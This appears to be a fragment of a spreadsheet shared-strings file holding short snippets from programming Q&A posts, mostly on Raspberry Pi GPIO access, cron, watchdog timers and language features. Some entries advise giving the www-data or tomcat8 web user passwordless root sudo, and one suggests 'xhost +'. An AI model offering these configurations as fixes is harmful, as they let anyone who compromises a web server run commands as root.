    <t>It seems not be an elegant way to handle with it, but I advise you to construct an execution management structure behind this Python script, like always initiate your python script after "boot loader" machine/device, make an another watchdog script, or something else like that, to prevent some internet connections problems, forcing the system to be rebooted or reconnect to the internet.</t>
  </si>
  <si>
    <t>Uninitialized RAM
Avr-gcc compiled applications usually have the whole on-chip RAM cleared to 0x00 before executing user code, i.e.</t>
  </si>
  <si>
    <t>Here is the part of build.xml that is causing the error:
&lt;!-- download and compile the 'wiringPi.a' native static library on the Raspberry
        Pi platform --&gt;
&lt;sshexec host="${pi-host}" port="${pi-port}" username="${pi-user}"
        password="${pi-password}" trust="true" failonerror="true"
        verbose="true" command="cd ${pi-dirBuildTemp};  sudo chmod +x wiringpi-build.sh; ./wiringpi-build.sh" /&gt;
I can't find the wiringpi-build.sh ...</t>
  </si>
  <si>
    <t>In the extending class you would implement the isValid() method logic and define the message variables and message templates that correspond to the types of validation failures that can occur.</t>
  </si>
  <si>
    <t>You have to:
Write the function itself
Create the IAM role required by the Lambda function itself (the executing role) to allow it access to any resources it needs to do its job
Add additional permissions to the Lambda function if it is going to be used in a Push model (e.g.</t>
  </si>
  <si>
    <t>With php-fpm you can run a PHP script by its owner easily, so you'd simply change the script owner to root, make sure the script works (security!)</t>
  </si>
  <si>
    <t>ERROR : Unable to execute Lambda function due to insufficient permissions; dropping the messages, number of messages dropped : 1, functionArn : arn:aws:lambda:eu-west-1:x:function:y
The IAM role associated with the Lambda y function has the following permissions:
AmazonDynamoDBFullAccess
AWSIoTAnalyticsFullAccess
AWSIoTFullAccess
Is there a policy perhaps that I do not have in my IAM role for the Lambda that is preventing it from doing what I need it to?</t>
  </si>
  <si>
    <t>There are hundreds of built-in features you can use to:
Create profiles for your members
Identify users with first/middle/last name fields
Add avatar photos to profiles
Add unlimited CB fields to your profiles (text, image, textarea, html editor, integer, checkbox, multi-select checkbox, drop-down, multi-select drop-down, radio, date, email, weblinks - more available with add-ons)
Use delimiter fields to put customized HTML code in profiles
Configure fields to be read-only, for profile viewing, displayed with title, to appear on registration form, etc
Control of core fields (email, username, etc), and ajax email and username checkers
Custom field validations
Organize fields in tabs that can be displayed in different built-in profile positions
Create extended registration form
Allow login using email address and password
Manage registration and profile image approval in frontend with CB Workflow module
Create unlimited CB User lists with powerful searching
Let members connect with each other (mutual consent or one way)
Display # of connections on profiles
Show connection path between profile viewer and owner up to 6th degree
Moderate your community with FE reporting, banning,
Let members interact (using email or PMS extension)
Built-in integration with Joomla articles (show article links in author profiles)
Built-in integration with Kunena forum
Use built-in integration with uddeIM messaging
Each CB distribution has:
+ component (universal for all J!</t>
  </si>
  <si>
    <t>As defined from w3.org:
An INPUT element with `TYPE=HIDDEN' represents a hidden field.</t>
  </si>
  <si>
    <t>With your function pointer you are able to call a function that is declared as private from outside the class!</t>
  </si>
  <si>
    <t>A closure is written using a "lambda expression" - basically an anonymous function.</t>
  </si>
  <si>
    <t>(unexpected_token at [all_tests_here1] lib\main.dart:14)
error: A value of type 'Future&lt;List&lt;WifiResult&gt;&gt;' can't be assigned to a variable of type 'List&lt;WifiResult&gt;'.</t>
  </si>
  <si>
    <t>The only exception are drivers which stay registered in the JDBC even after the corresponding R object is released as there is currently no way to unload a JDBC driver (in RJDBC).</t>
  </si>
  <si>
    <t>If I download the source package from the Node.js website (Node.js v0.12.1 or Node.js v0.12.2) and run the  script I'm getting this two errors: 
compilation fails with error messages on src/node.cc when I pass the --without-ssl option 
compilation is successfull, but when I execute ./node in the out/Release directory I get the error of Illegal instruction
So how to do it right?</t>
  </si>
  <si>
    <t>echo "18" &gt; /sys/class/gpio/export
chgrp -HR /sys/class/gpio/gpio18
chmod -R 775 /sys/class/gpio/gpio18
Now your user has access to the first GPIO pin 18.
source : https://www.raspberrypi.org/forums/viewtopic.php?t=5185
when executing the echo with permissions a new directory appears in /sys/class/gpio i.e.</t>
  </si>
  <si>
    <t>Irreducible means that all the attributes of the key are necessary to guarantee uniqueness - remove any one attribute and the uniqueness property would be lost.</t>
  </si>
  <si>
    <t>The
  following table breaks down API support in Android Things: 
Unavailable APIs:
AdMob 
Android Pay
Drive 
Firebase App Indexing 
Firebase Authentication
Firebase Dynamic Links 
Firebase Invites 
Firebase Notifications
Play Games 
Sign-In</t>
  </si>
  <si>
    <t>You may need to install this, on a debian-derived distribution that would be sudo apt-get install gdb
Then run your program
or if your program needs command line arguments
gdb myprog --args some_argument another_argument
Once gdb starts up type run, and the program will execute near normally until it reaches the illegal instruction, at which point you will be dumped back at the gdb prompt with a hopefully informative error message.</t>
  </si>
  <si>
    <t>I was aware of the datasheet specification that the watchdog must be disabled prior to setup(), since it is automatically enabled after reset so that included in my code is as follows:
The purpose of the code is to isolate the watchdog problem and invoke watchdog reset as I please.</t>
  </si>
  <si>
    <t>It handles common tasks such as building and parsing common content-types, handling common content-encodings, and built-in support for common authentication mechanisms.</t>
  </si>
  <si>
    <t>It uses the exact same url that I'm trying to use for Meteor and it works as expected:
var connect = require('mongodb').connect;
var url = 'mongodb://&lt;user&gt;:&lt;password&gt;@&lt;cloud_id&gt;.mongolab.com:&lt;port&gt;/&lt;database&gt;';
connect(url, function(err, db) {
    db.collection('test', function(err, collection) {
       // Insert 3 records
        for(var i = 0; i &lt; 3; i++) {
          collection.insert({'a':i});
        }
    });
});
I don't really understand the trace message but it seems like FormatString call is what triggers the exception.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.5m -c systemd/_daemon.c -o build/temp.linux-armv6l-3.5/systemd/_daemon.o
  systemd/_daemon.c:539:31: fatal error: systemd/sd-daemon.h: No such
  file or directory    #include 
                                   ^   compilation terminated.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.5m -c systemd/_daemon.c -o build/temp.linux-armv6l-3.5/systemd/_daemon.o
      systemd/_daemon.c:539:31: fatal error: systemd/sd-daemon.h: No such file or directory
       #include 
                                     ^
      compilation terminated.</t>
  </si>
  <si>
    <t>Side note, it appears these people are targeting Debian Servers with default root passwords (assuming this because I left my password as the default).</t>
  </si>
  <si>
    <t>If a member of a class is not annotated with `private`, `protected`, or `public`, then the member is `package private` by default.</t>
  </si>
  <si>
    <t>Wiki
A friend function in a  class is defined outside the scope of a class but it has the right to access all private and protected members of the class.</t>
  </si>
  <si>
    <t>Its approach differs from the built-in encoders in the .NET framework in that it uses a safe-list approach, rather than a limited black-list.</t>
  </si>
  <si>
    <t>The attributes indicate the type of privileges required by an assembly, a class, or a certain member of the class.</t>
  </si>
  <si>
    <t>The iostreams classes support type-safe I/O of built-in types and can be extended to support user-defined types by overloading the &gt;&gt; and &lt;&lt; operators.</t>
  </si>
  <si>
    <t>Java Generic allows a type or method to operate on objects of various types while providing compile-time type safety.</t>
  </si>
  <si>
    <t>If OP ran his scripts via the non-privileged pi user's crontab by adding the cron entries via crontab -e (without sudo), the paths would be valid (home or ~/ would now mean /home/pi/) but then he wouldn't have access to the GPIO device since pi is pretty unprivileged.</t>
  </si>
  <si>
    <t>I have registered an event handler with KeyPressMask on the top level shell, and when that didn't work, on the RowColumn and all buttons.</t>
  </si>
  <si>
    <t>I think I can answer my own question: The documentation says: Foreign key constraints are disabled by default (for backwards compatibility), so must be enabled for each database connection separately.</t>
  </si>
  <si>
    <t>This facility is orthogonal to the type of type system used, the function binding regime (whether late or early), whether or not there is a privacy regime, or indeed the evaluation (whether lazy or weak).</t>
  </si>
  <si>
    <t>This is illegal since stack allocated memory is only valid in the function in which the variable is declared.</t>
  </si>
  <si>
    <t>Where possible, it is recommended to avoid cloning elements with this attribute or using class attributes as identifiers instead.</t>
  </si>
  <si>
    <t>In addition there is a file /etc/apt/sources.list.d/raspi.list that looks like this:
The following is a complete list of all files in /etc/apt inclusive file permission settings.</t>
  </si>
  <si>
    <t>Dynamic proxy classes are useful to an application or library that needs to provide type-safe reflective dispatch of invocations on objects that present interface APIs.</t>
  </si>
  <si>
    <t>While a local class definition is a statement in a block of code, an anonymous class definition is an expression, which means that it can be included as part of a larger expression, such as a method call.</t>
  </si>
  <si>
    <t>Immediately-invoked function expressions can be used to avoid variable hoisting from within blocks, protect against polluting the global environment and simultaneously allow public access to methods while retaining privacy for variables defined within the function.</t>
  </si>
  <si>
    <t>Templates and CSS are fully customizable
JQuery triggers enable you to add javascript to respond when items are added or removed, so other interface elements on the page can react
Default (but customizable) security prevents griefers from pilfering your data via JSON requests
Projects website:
https://github.com/crucialfelix/django-ajax-selects</t>
  </si>
  <si>
    <t>Then, add yourself to the group using:
(where me is your username and the_group is the group of the device)
You might need to log out/in to gain the effect of the changed group permissions.</t>
  </si>
  <si>
    <t>You can also whitelist CSS properties, @ rules, and URL protocols you wish to allow in elements or attributes containing CSS.</t>
  </si>
  <si>
    <t>By default, there isnt a need to define an explicit mapping, since one is automatically created and registered when a new type or new field is introduced (with no performance overhead) and have sensible defaults.</t>
  </si>
  <si>
    <t>If you want to build a forgot password functionality, you should build out an API on a server that you control that has the forgot password functionality.</t>
  </si>
  <si>
    <t>Useful for anonymous objects, dynamic properties.</t>
  </si>
  <si>
    <t>Please use [anonymous-function] or [anonymous-class] instead.</t>
  </si>
  <si>
    <t>A class member whose access specifier is  protected can only be used by some other classes.</t>
  </si>
  <si>
    <t>You can check this by running echo shell_exec("whoami"); 
You can easly fix this by adding line "www-data ALL=(ALL) NOPASSWD: ALL" into your "/etc/sudoers" file and then run "echo shell_exec("sudo echo 'standby 0' | sudo cec-client -s");", hovewer this will add to the user www-data all of the sudo permissions and it is very unsecure, but it will work.</t>
  </si>
  <si>
    <t>See also:
Driver Signing changes in Windows 10, version 1607
USB serial driver (Usbser.sys)
In Windows 10, the driver has been rewritten by using the Kernel-Mode Driver Framework that improves the overall stability of the driver.</t>
  </si>
  <si>
    <t>Determines whether an expression is a valid numeric type.</t>
  </si>
  <si>
    <t>A class member whose access specifier is private can only be used by instances of that class.</t>
  </si>
  <si>
    <t>Type safety is the extent to which a language discourages using variables in an unsafe manner, according to the variables' type.</t>
  </si>
  <si>
    <t>I can only shed some light on the error message:
gcc: internal compiler error: Illegal instruction (program as)
gcc does several things when compiling.</t>
  </si>
  <si>
    <t>See also:
The Firebase documentation for the command line tools
Related tags
firebase-database
firebase-authentication
firebase-hosting
firebase-storage
firebase-security
google-cloud-functions</t>
  </si>
  <si>
    <t>For this reason, content scripts are isolated from a target-page's javascript by scoping, and/or sandboxing, and/or anonymous function wrapping.</t>
  </si>
  <si>
    <t>An option "unchecked" used to turn off a javac compiler warnings about failing to use generics because it does not have enough type information to perform all type checks necessary to ensure type safety.</t>
  </si>
  <si>
    <t>(canonical Q&amp;A on serverfault.com)
Troubleshooting
There are several reasons for why a cron job wouldn't run as expected:
Using percent signs, as in date +%F
Incorrect timespec
Adding or omitting username, depending
Cron isn't running
Problems with syntax or permissions
Making assumptions about the environment
These are all described below.</t>
  </si>
  <si>
    <t>void initialize()
{
    struct IDENTITY testguy;
    testguy.identifier = 1;
    testguy.is_alive = true;
}
This function is below the struct definition, and when I compile, it does not give me errors.</t>
  </si>
  <si>
    <t>The  class is used as a base class (usually private) to make a C++ type unable to be copied or assigned.</t>
  </si>
  <si>
    <t>Use mysql.cnf file
Mysql cnf files is a config file storing MySQL credentials, if this server or client executing the script has one, you can use it like:
Credentials are not in your Python script anymore, but they are clear in cnf file anyway and you must have this file in the same place everywhere you want to use your script.</t>
  </si>
  <si>
    <t>It is hidden most of the time, but is revealed when the user swipes a finger from the left edge of the screen or, while at the top level of the app, the user touches the app icon in the action bar.</t>
  </si>
  <si>
    <t>Do I have to enable or disable or do anything else before I can protect volumes?</t>
  </si>
  <si>
    <t>Password required
230-Your bandwidth usage is restricted
230-OK. Current restricted directory is /
230 Max allowed filesize is 10485760 bytes
215 UNIX Type: L8
200 TYPE is now 8-bit binary
227 Entering Passive Mode (81,171,31,230,225,201)
Data port: 57801
Data connected
250 OK. Current directory is /xxx.cba.pl
19080400.log
150 Accepted data connection
226-File successfully transferred
226 0.094 seconds (measured here), 59.55 Kbytes per second
19080402.log</t>
  </si>
  <si>
    <t>It works if I define the strings I want using #define....sta is the struct that holds the configuration parameters, sta is unioned with another struct into the data type that is wifi_config_t....ssid and password are of type uint8_t
But I am trying to make it so that I can change the SSID and Pass at run time, which is why I want to set up a variable.</t>
  </si>
  <si>
    <t>If we cannot use unsigned (perhaps the assignment is to write code that works for any signed integer type, not just int), then I expect the assignment is impossible using only the listed operators.</t>
  </si>
  <si>
    <t>MS SQL Server has the IDENTITY data type, and from the 2012 version, the explicit SEQUENCE object as well.</t>
  </si>
  <si>
    <t>The second type of authentication is comparing the attributes of the object itself to what is known about objects of that origin.</t>
  </si>
  <si>
    <t>Debugging crontab
There are several reasons for why a cron job wouldn't run as expected:
Using percent signs, as in date +%F
Incorrect timespec
Adding or omitting username, depending
Cron isn't running
Problems with syntax or permissions
Making assumptions about the environment
These are all described below.</t>
  </si>
  <si>
    <t>I've had success running this function in a if statement and was convinced it did return a 0 or 1.
if whiptail --yesno "Are you sure you want to clear all SSH keys from the list?"</t>
  </si>
  <si>
    <t>It is recommended to use the screen device which is listed in the Hardware compatibility list.</t>
  </si>
  <si>
    <t>Java's Double-Brace initialization creates Objects using anonymous classes.</t>
  </si>
  <si>
    <t>The "unchecked" warning is disabled, by default, though the compiler gives a hint.</t>
  </si>
  <si>
    <t>A member function is a procedure that whose signature is declared inside a class.</t>
  </si>
  <si>
    <t>Please note that there is no guarantee of backwards compatibility for any versions prior to version v1.0.0.</t>
  </si>
  <si>
    <t>Features
Regular expression matching with Perl-compatible regular expression syntax
Automatic configuration reloading
Can act as a transparent proxy (like Apache's mod_proxy)
Uses .htaccess syntax with some exceptions
Open source
Resources
IIRF on codeplex: http://iirf.codeplex.com/</t>
  </si>
  <si>
    <t>This way she can modify it without
    //integrity loss for the entire class
    struct gps_data_t* gps_inner_open(const char *host, const char *port);
    struct gps_data_t _gps_state;
    struct gps_data_t * gps_state() { return &amp;_gps_state; }
    struct gps_data_t* backup(void) { *to_user = *gps_state(); return to_user; }; //return the backup copy
};
#endif // _GPSD_GPSMM_H_
If anyone can help me figure out my problem, I would be grateful.</t>
  </si>
  <si>
    <t>I don't think changing the default ownership and permissions of sysfs is possible without hacking up your kernel, and even then it would be tricky: sysfs is intricately connected with object model of the the Linux Driver model.</t>
  </si>
  <si>
    <t>I thought the below was a neat way to implement enums in C. 
This adds some type safety and I can also  acces each member through state.XXX which I think is a lot more neat than prepend all the names of the enum items, and access the members in a fashion like state_XXX.</t>
  </si>
  <si>
    <t>I have a front page with only one button: "ARM" that redirects to "/ARM" and a page "/DISARM":
When the motion sensor detects movement, callback function "alert" is executed:
When the system is armed (but not triggered) it can be disarmed, but the problem is in disactivating the system after the detection (20s period).</t>
  </si>
  <si>
    <t>Because of the needed sudo privileges for the lib, I created a bash script, that could be executed with sudo by www-data (only this script - security).</t>
  </si>
  <si>
    <t>If you rely on such scripts, you might want to install Violentmonkey or Tampermonkey, both of which provide better compatibility for existing scripts.</t>
  </si>
  <si>
    <t>On an Raspberry Pi running stretch
installed mysql 
sudo apt-get install mysql-server 
No errors
pi@raspberrypi:~ $ mysql -u root
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
Then I tried
pi@raspberrypi:~ $ mysql_secure_installation
NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MariaDB
      SERVERS IN PRODUCTION USE!</t>
  </si>
  <si>
    <t>The reason the library check is failing is because  is not enabled and GPS_PROVIDER is only enabled if you have a GPS driver registered.</t>
  </si>
  <si>
    <t>Look for options in the router to enable/disable IGMP snooping and potentially enable/disable different IGMP versions.</t>
  </si>
  <si>
    <t>Here is my current code:
The idea is to enter the virtual environment and execute another python script with added facial detection arguments.</t>
  </si>
  <si>
    <t>Make sure serial is enabled 
P6 Interfacing Options
No to enabling login shell
Yes to enable serial port hardware
Then run 
Test with cgps -s</t>
  </si>
  <si>
    <t>It seems that  user doesn't have the proper permissions to access to the ALSA drivers in the pi, so I add it to the video and audio groups and, it worked.</t>
  </si>
  <si>
    <t>anonymous function or anonymous method) or lambda expression, the variables thus referred to are "captured".</t>
  </si>
  <si>
    <t>Transparency is the property of being see-through; a transparent object reveals objects behind it.</t>
  </si>
  <si>
    <t>std::unique_ptr is a smart pointer that retains sole ownership of an object through a pointer.</t>
  </si>
  <si>
    <t>Specifications and ghost constructs are used only during verification; the compiler omits them from the executable code.</t>
  </si>
  <si>
    <t>Non-interrupt level code must lock out interrupts to ensure that data structures and I/O are not interfered with by an interrupt handler.</t>
  </si>
  <si>
    <t>The class template std::variant represents a type-safe union.</t>
  </si>
  <si>
    <t>When a member is `package-private`, it can only be accessed by the parent class, and other classes in the same package.</t>
  </si>
  <si>
    <t>If I use uwfmgr.exe volume protect c: for example, it works and UWF_Volume now suddenly has (the correct) 2 entries for C:, one for the current and one for the next session.</t>
  </si>
  <si>
    <t>By default, the example programs will look in the current directory for your certificate and private key files, but you can also use the '-f' option to specify another directory if you want to.</t>
  </si>
  <si>
    <t>Consider that directories with name starting with a dot are normally hidden; if using a file manager you must enable "show hidden files", if you use the shell,  can help.</t>
  </si>
  <si>
    <t>The access specifier in an object-oriented language determines how a class restricts access to its members.</t>
  </si>
  <si>
    <t>The chgrp (from change group) command may be used by unprivileged users on Unix-like systems to change the group associated with a file system object (such as a file, directory, or link) to one of which they are a member.</t>
  </si>
  <si>
    <t>This is expressed using the enum class (enum struct is also accepted as a synonym) declaration:
This enumeration is type-safe.</t>
  </si>
  <si>
    <t>Three kinds of dropdown menus can be created:
Disclosure, childs of drop down cell are treated as disclosure cells, useful for grouping detailed view controllers.</t>
  </si>
  <si>
    <t>(private encapsulation with opaque type/opaque pointers)
Typedefs, tagged and untagged structures, and incompatible pointer types
The pre-processor and macros
What is the difference between #include &lt;filename&gt; and #include "filename"?</t>
  </si>
  <si>
    <t>Since a JSON structure is usually anonymous and doesn't necessarily have a "root member object" JSONPath assumes the abstract name $ assigned to the outer level object.</t>
  </si>
  <si>
    <t>", and so it never gets to "station:"
I was able to get past this by adding 'child.expect' and 'child.sendline' statements to my script to enter the Email and Password, but then it stops because "TLS handshake failed"
Since the Email, Password, and TLS info are all the config file, I figure it isn't accessing the config file for some reason.</t>
  </si>
  <si>
    <t>I would find it better for the script to run at login, and this is how you would do it:
You can add your script executable command to the bottom of .bashrc that will run your script every time you log in.</t>
  </si>
  <si>
    <t>Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key.</t>
  </si>
  <si>
    <t>jQuery provides ways to do that with an anonymous function:
$(function () { 
    /* code here */ 
});
// Or
$(document).ready(function () { 
    /* code here */ 
});
or with a named function:
$(functionName);
// Or
$(document).ready(functionName);
These are alternatives to placing the JavaScript code or script tag in the HTML right before the closing &lt;/body&gt; tag.</t>
  </si>
  <si>
    <t>The value in your variable was almost certainly put there by your compiler in an attempt to help you realize that it's uninitialized.</t>
  </si>
  <si>
    <t>If you do this, to be safe you'd need to make sure that anywhere you use SPI outside of the interrupt handler locks out interrupts.</t>
  </si>
  <si>
    <t>I'm new to Node JS and perhaps I misunderstanding but, why does it stop my parent process once the child process authenticates and doesn't execute output the parent process unless I change the state of "V0"
The child process:</t>
  </si>
  <si>
    <t>A data element has:
An identification such as a data element name
A clear data element definition
One or more representation terms
Optional enumerated values Code (metadata)
A list of synonyms to data elements in other metadata registries Synonym ring
Data elements usage can be discovered by inspection of software applications or application data files through a process of manual or automated Application Discovery and Understanding.</t>
  </si>
  <si>
    <t>I have the following:
I only want to execute the warn_user() function once in 30 seconds, after that, the if statement shouldn't trigger anymore, only when the values drop under 50 and THEN &gt; 50 again.</t>
  </si>
  <si>
    <t>You protect this by disabling the interrupts in the main loop() while accessing the shared object.</t>
  </si>
  <si>
    <t>In this way, the keys used by a particular object to encode its instance variables need to be unique only within the scope of that object.</t>
  </si>
  <si>
    <t>The stacktrace indicates that your program triggered a 
SIGILL The SIGILL signal is sent to a process when it attempts to
  execute an illegal, malformed, unknown, or privileged instruction.</t>
  </si>
  <si>
    <t>Error: bash: ChromeTab.sh: command not found
./ChromeTab.sh
I have also ensured read/write and execute permissions on the file with
chmod +x ./ChromeTab.sh
Also, my bash script starts off with the following shebang
#!/bin/sh
So, what i'm trying to say is, regardless of using crontab or not the issue at hand is that I can not even execute the script from command line.</t>
  </si>
  <si>
    <t>However, I was able to accomplish my goals anyway (edge detection without any actual interrupts being generated) by enabling interrupts for the GPIO pins of interest, but not enabling the NVIC interrupt channel that all the GPIO interrupts are funneled through - EINT3, on this particular chip.</t>
  </si>
  <si>
    <t>There are a couple of helper classes Microsoft has created to help with the details of dealing with raw variants:
The ATL class CComVariant
The _variant_t class
These classes relieve much of the grunt work of interop programming with variants such as doing deep destroys on contained SAFEARRAYs.</t>
  </si>
  <si>
    <t>~/.bash_profile is a script executed when a bash user logs on.</t>
  </si>
  <si>
    <t>When I list the permissions on that file, I see that both root and the gpio group have read and write permissions, and my current user 'pi' is part of the gpio group.</t>
  </si>
  <si>
    <t>In the watchdog API says that '..the driver will not disable the
watchdog unless a specific magic character 'V' has been sent to
 /dev/watchdog just before closing the file.'</t>
  </si>
  <si>
    <t>EDIT: I was able to use sshpass in my bash script but the following commands like top and kill don't execute.</t>
  </si>
  <si>
    <t>sudo chmod -R 755 /var/www/
The 755 will apply read, write &amp; execute permissions for the owner, and read &amp; execute permissions for the group &amp; others.</t>
  </si>
  <si>
    <t>To enable debugging, it is recommended to enable debug symbol generation in CMake and disable optimizations.</t>
  </si>
  <si>
    <t>ngBindHtml creates a binding that will innerHTML the result of evaluating the expression into the current element in a secure way.</t>
  </si>
  <si>
    <t>The NSCoding protocol declares the two methods that a class must implement so that instances of that class can be encoded and decoded.</t>
  </si>
  <si>
    <t>ngBindHtml creates a binding that will  the result of evaluating the expression into the current element in a secure way.</t>
  </si>
  <si>
    <t>Guarded pointer QPointer&lt;T&gt; is like normal pointer T* except it is automatically set to 0 when referenced object is destroyed.</t>
  </si>
  <si>
    <t>If the Global Interrupt Enable Register
  is cleared, none of the interrupts are enabled independent of the
  individual interrupt enable settings.</t>
  </si>
  <si>
    <t>One way to make Bar immutable is to make members private and make sure only the constructor can modify it.</t>
  </si>
  <si>
    <t>You need to add permission to your target lambda,
you can create a lambda, then run this code.</t>
  </si>
  <si>
    <t>Having a single type
  identity ensures type compatibility between applications that share
  the types defined in the PIA.</t>
  </si>
  <si>
    <t>I can run one script or the other, and if I automate the checking script (cron hasn't worked though I dare say I'm doing something wrong) with rc.local it just gets stuck in a checking loop before login, which kinda makes sense given the script.</t>
  </si>
  <si>
    <t>You seem to be quite new to the things you do, so there are 2 things that come to my mind
(as already mentioned) you need a running xserver instance running
does your  bash variable yield the correct display (AFAIK gtk+-2.0 honors that, also make sure it is properly exported)
xhost + to allow access from another terminal to your current xserver (Note this has serious security issues, for details read http://www.tldp.org/LDP/intro-linux/html/sect_10_05.html and refer to the xhost manpage - no shortcuts!)</t>
  </si>
  <si>
    <t>[Service]
Type=oneshot
RemainAfterExit=true
ExecStop=/home/pi/shutdownScript.sh
[Install]
WantedBy=multi-user.target
3: Move it into the correct directory for systemd by running sudo mv /home/pi/example.service /etc/systemd/system/example.service
4: Ensure the script to launch upon shutdown has appropriate permissions: chmod u+x /home/pi/shutdownScript.sh
5: Start the service: sudo systemctl start example --now
6: Make the service automatically start upon boot: sudo systemctl enable example
7: Stop the service: sudo systemctl stop example
This last command will mimic what would happen normally when the system shuts down, i.e.</t>
  </si>
  <si>
    <t>Here is my code:
I run this code and the error message I get is 
I checked to make sure chromedriver is an executable file and it is, I know this from looking under properties and permissions and it says anyone can execute the file.</t>
  </si>
  <si>
    <t>Looking at another function in the lib shows how to obtain the a valid deviceAddress pointer.</t>
  </si>
  <si>
    <t>Direct privately derived classes that also have private access to protected members.</t>
  </si>
  <si>
    <t>CSS classes
ng-valid Is set if the form is valid.</t>
  </si>
  <si>
    <t>with traces enabled, I see the 15 handshake steps occur, then the I get the following error:
The reason looks suspicious to me, but server side, the device is enabled and looking at the source code, the only response is that the server rejected the connection.</t>
  </si>
  <si>
    <t>(Web page would run the arming scripts)
But for this I need to have a wireless router (currently I have a non wireless Ubiquiti Router Station Pro, no radio card on it) and need to enable wireless on my phone (it is not enable-d, battery reasons) before leave, connect and so on.</t>
  </si>
  <si>
    <t>Since Raspbian is based on Debian you'd expect the same, but Raspbian's armhf targets ARMv6 hard-float (which is the very reason of the existence of Raspbian in the first place: find a middle ground between Debian's armel -- ARMv4t soft-float -- and armhf architectures to correctly exploit the Raspberry's CPU).</t>
  </si>
  <si>
    <t>Proxy objects allow calls to members of an object to be intercepted without modifying the code of the class.</t>
  </si>
  <si>
    <t>In C++ friend function is a kind of function that is a "friend" of a given class is allowed access to private and protected data in that class that it would not normally be able to as if the data was public.</t>
  </si>
  <si>
    <t>Some examples I have tried:
; on_motion_detected python /home/pi/Desktop/Python/script.py
; on_movie_start python /home/pi/Desktop/Python/script.py
; on_picture_save sudo python /home/pi/Desktop/Python/script.py
I have also changed the script to different directories, speculating a permission issue.</t>
  </si>
  <si>
    <t>If I try to execute Protect on the ManagementObject with DriveLetter=C: I get an Access denied exception, I assume because its the object for the current session.</t>
  </si>
  <si>
    <t>Here is a snapshot from my IoT Edge Module Details page on the Azure Portal:
https://i.imgur.com/0Z4epYZ.png
I've also put 
    {
      "HostConfig": {
        "Privileged": true
      }
    }
inside of the CreateOptions field within deployment.template.json
Here is my dockerfile: 
    FROM arm32v7/node:8-slim
    WORKDIR /app/
    COPY package*.json ./
    RUN apt-get update
    RUN apt-get -y install sudo
    RUN useradd -m docker &amp;&amp; echo "docker:docker" | chpasswd &amp;&amp; adduser docker sudo
    RUN apt-get install -y python
    RUN apt-get install -y build-essential
    RUN npm install --production
    COPY app.js ./
    RUN sudo groupadd gpio
    RUN sudo usermod -aG gpio docker
    RUN su docker
    RUN sudo chgrp gpio /sys/class/gpio/export
    RUN sudo chgrp gpio /sys/class/gpio/unexport
    RUN sudo chmod 775 /sys/class/gpio/export
    RUN sudo chmod 775 /sys/class/gpio/unexport
    USER docker
    CMD ["node", "app.js"]
Note: this is all in Visual Studio Code.</t>
  </si>
  <si>
    <t>Datasheet says:
Note: If the Watchdog is accidentally enabled, for example by a runaway pointer or brown-out condition, the
  device will be reset and the Watchdog Timer will stay enabled.</t>
  </si>
  <si>
    <t>thank you... this is it need to add the tomcat8 user to sudoers file with no password and execute python script with sudo...</t>
  </si>
  <si>
    <t>ClassFormatException
Thrown when the BCEL attempts to read a class file and determines that
  the file is malformed or otherwise cannot be interpreted as a class
  file.</t>
  </si>
  <si>
    <t>The  protocol declares the two methods that a class must implement so that instances of that class can be encoded and decoded.</t>
  </si>
  <si>
    <t>Run the command 
If that does not fix the problem, (assuming you have a webserver running apache) run "sudo a2enmod" in terminal, then sudo chmod +x /usr/lib/cgi-bin then restart apache (sudo service apache restart)
Note:
If error "could not write permissions, directory does not exist" occurs, you will need to run command 'sudo mkdir /usr/lib/cgi-bin/' in terminal
Create a cgi script to call bash script:
Then you must save this file as /usr/lib/cgi-bin/first.cgi and assign it permissions with "sudo chmod +x /usr/lib/cgi-bin/first.cgi" Assuming that your apache server is set up correctly (Various guides can be found about enabling the cgi module correctly, if a2enmod did not work properly), you should now be able to go to the web browser on another LAN machine and browse to http://IPofRPI/cgi-bin/first.cgi.</t>
  </si>
  <si>
    <t>Features:
Compatible with Flash 10
Avoids built in browser security conflicts by using a 3rd party browser plugin (Adobe Flash)
Invisible overlay, no interference with page design
Support for CSS ":hover" and ":active" states
Preserves the targeted element's "click" "mouseenter" and "mouseleave" events
Supplies callback functions for "before copy" and "after copy"
Extremely light weight!</t>
  </si>
  <si>
    <t>I have also tried to run the powershell script to install the Uwp package with dependencies added, but in that case it shows that the default account has no privilege to execute these commands as part of the install app script.</t>
  </si>
  <si>
    <t>Try to make www-data the owner of the folder and the content that contain the script:
and then give to the php script file permissions:</t>
  </si>
  <si>
    <t>As suggested by other responses, I've also tried:
exec('sh /var/www/html/scripts/myBashScript.sh')
exec('./scripts/myBashScript.sh')
exec('sh ./scripts/myBashScript.sh')
Both script file and its containing folder have rwx permissions for the Apache user (www-data).</t>
  </si>
  <si>
    <t>All of these (token, GpioPin instance, event handler and init methods) are members of same public class SimpleSerialProtocol.</t>
  </si>
  <si>
    <t>Currently, you're JSON-encoding an object as a string, and then when you're sending the anonymous type instance to Cloud IoT, that's applying JSON encoding again.</t>
  </si>
  <si>
    <t>Tokeninput is a jQuery plugin which allows your users to select multiple items from a predefined list, using autocompletion as they type to find each item.</t>
  </si>
  <si>
    <t>Overview
Tokeninput is a jQuery plugin which allows your users to select multiple items from a predefined list, using autocompletion as they type to find each item.</t>
  </si>
  <si>
    <t>To provide property change notification your class should derive from INotifyPropertyChanged and provide a protected method to raise the event.</t>
  </si>
  <si>
    <t>In this case when i run Arduino programm, some banner appears which warns me that my user is not in 'dialout' and 'lock' group.Do you want add your user in this groups?</t>
  </si>
  <si>
    <t>For security reasons, xp_cmdshell is disabled by default in recent versions of SQL Server.</t>
  </si>
  <si>
    <t>The current version of Google Web Accelerator is incompatible with the tampering function of TamperData.</t>
  </si>
  <si>
    <t>Good question, yes you're right, in UWP apps, we can only save the registered type of files into remote device, you can register all types that your know, but it is unavoidable that downloaded files with unregistered file types are also needed to be saved into SD card.</t>
  </si>
  <si>
    <t>To avoid this situation, the application software should
  always clear the Watchdog System Reset Flag (WDRF) and the WDE control bit in the initialization routine,
  even if the Watchdog is not in use.</t>
  </si>
  <si>
